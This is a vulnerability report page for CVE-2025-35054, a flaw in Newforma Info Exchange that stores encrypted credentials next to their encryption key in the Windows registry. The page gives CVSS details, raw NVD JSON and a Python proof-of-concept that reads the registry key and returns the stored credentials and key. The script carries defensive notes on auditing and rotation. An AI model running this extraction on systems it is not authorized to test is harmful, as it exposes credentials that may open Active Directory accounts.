Security Vulnerability Report
CVE-2025-35054 CVSS 5.3 MEDIUM

CVE-2025-35054

Published: 2025-10-09 21:15:36
Last Modified: 2025-10-22 15:18:27
Source: 9119a7d8-5eab-497f-8521-727c672e3725

Description

Newforma Info Exchange (NIX) stores credentials used to configure NPCS in 'HKLM\Software\WOW6432Node\Newforma\<version>\Credentials'. The credentials are encrypted but the encryption key is stored in the same registry location. Authenticated users can access both the credentials and the encryption key. If these are Active Directory credentials, an attacker may be able to gain access to additional systems and resources.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:newforma:project_center:*:*:*:*:*:*:*:* - VULNERABLE
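Newforma Info Exchange (NIX) 所有存储NPCS凭证的版本 (all versions that store NPCS credentials; note that the CPE match in the raw JSON record below is bounded by versionEndIncluding 2024.3)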

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
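# PoC for CVE-2025-35054
# Check: are encrypted credentials and their decryption key co-located in the Windows Registry?
# Target: Newforma Info Exchange (NIX) NPCS configuration
# Registry Path: HKLM\Software\WOW6432Node\Newforma\<version>\Credentials
#
# Defender notes:
#   * The script only reports value NAMES. The value data it returns are live
#     secrets: do not log, print or persist them.
#   * Reads of this key by non-service accounts are the observable signal; an
#     audit SACL on the key (Windows "Audit Registry", event 4663) surfaces them.
import winreg
import sys

# Raw string on purpose: in a normal literal "\N" (as in "\Newforma") is parsed
# as a named-character escape and the module fails to compile.
NEWFORMA_ROOT = r"SOFTWARE\WOW6432Node\Newforma"


def extract_nix_credentials(version="Latest"):
    """Report whether a NIX install stores its key next to its credentials.

    Opens ``HKLM\\SOFTWARE\\WOW6432Node\\Newforma\\<version>\\Credentials``
    read-only, enumerates its values and sorts them into "key-like" names
    (containing ``key`` or ``secret``) and everything else.

    Args:
        version: Name of the version subkey under the Newforma root.

    Returns:
        ``(credentials, encryption_key)`` where ``credentials`` maps value
        names to their stored (encrypted) data and ``encryption_key`` is the
        data of the last key-like value seen. ``(None, None)`` when the path
        is missing, access is denied, or either half was not found.
    """
    registry_path = f"{NEWFORMA_ROOT}\\{version}\\Credentials"

    try:
        # Context manager closes the handle even if enumeration raises.
        with winreg.OpenKey(
            winreg.HKEY_LOCAL_MACHINE, registry_path, 0, winreg.KEY_READ
        ) as reg_key:
            credentials = {}
            encryption_key = None

            index = 0
            while True:
                try:
                    value_name, value_data, _value_type = winreg.EnumValue(
                        reg_key, index
                    )
                except OSError:
                    # EnumValue signals "no more values" with OSError.
                    break

                # NOTE(review): the name match is a heuristic; the advisory on
                # this page does not give the real value names, so expect
                # false positives/negatives and confirm manually.
                lowered = value_name.lower()
                if "key" in lowered or "secret" in lowered:
                    encryption_key = value_data
                    print(f"[+] Found encryption key: {value_name}")
                else:
                    credentials[value_name] = value_data
                    print(f"[+] Found encrypted credential: {value_name}")
                index += 1
    except PermissionError:
        print("[-] Permission denied. Requires at least local user access.")
        return None, None
    except FileNotFoundError:
        print(f"[-] Registry path not found: {registry_path}")
        print("[-] NIX may not be installed or version path differs.")
        return None, None

    if encryption_key and credentials:
        print("\n[!] VULNERABLE: Encryption key found alongside credentials!")
        print(f"[!] Key location: HKLM\\{registry_path}")
        print(f"[!] Number of credentials found: {len(credentials)}")
        print("\n[*] An attacker with local access can decrypt these credentials")
        print("[*] using the co-located encryption key to obtain plaintext.")
        # A positive result means the stored account must be treated as
        # readable by every authenticated local user: rotate it, reduce it to
        # least privilege (especially if it is an Active Directory account),
        # and apply the guidance in the advisory referenced on this page.
        return credentials, encryption_key

    print("[-] Encryption key or credentials not found at expected path.")
    return None, None


if __name__ == "__main__":
    print("=" * 70)
    print("CVE-2025-35054 - Newforma Info Exchange Credential Extraction PoC")
    print("=" * 70)

    # Try to enumerate installed Newforma versions
    try:
        versions = []
        with winreg.OpenKey(
            winreg.HKEY_LOCAL_MACHINE, NEWFORMA_ROOT, 0, winreg.KEY_READ
        ) as parent_key:
            index = 0
            while True:
                try:
                    # EnumKey returns the subkey name as a plain string (not a
                    # tuple like EnumValue), so it must not be unpacked.
                    versions.append(winreg.EnumKey(parent_key, index))
                except OSError:
                    break
                index += 1

        if versions:
            print(f"\n[*] Found Newforma versions: {versions}")
            for ver in versions:
                extract_nix_credentials(ver)
        else:
            extract_nix_credentials()
    except FileNotFoundError:
        print("[-] Newforma software not found on this system.")
    except PermissionError:
        print("[-] Permission denied. Requires at least local user access.")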

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-35054", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2025-10-09T21:15:36.357", "lastModified": "2025-10-22T15:18:27.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Newforma Info Exchange (NIX) stores credentials used to configure NPCS in 'HKLM\\Software\\WOW6432Node\\Newforma\\<version>\\Credentials'. The credentials are encrypted but the encryption key is stored in the same registry location. Authenticated users can access both the credentials and the encryption key. If these are Active Directory credentials, an attacker may be able to gain access to additional systems and resources."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-257"}, {"lang": "en", "value": "CWE-522"}, {"lang": "en", "value": "CWE-922"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:newforma:project_center:*:*:*:*:*:*:*:*", "versionEndIncluding": "2024.3", "matchCriteriaId": "71630A80-6292-4C7B-A5C9-8C6877EE229E"}]}]}], "references": [{"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-282-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-35054", "source": 
"9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}]}}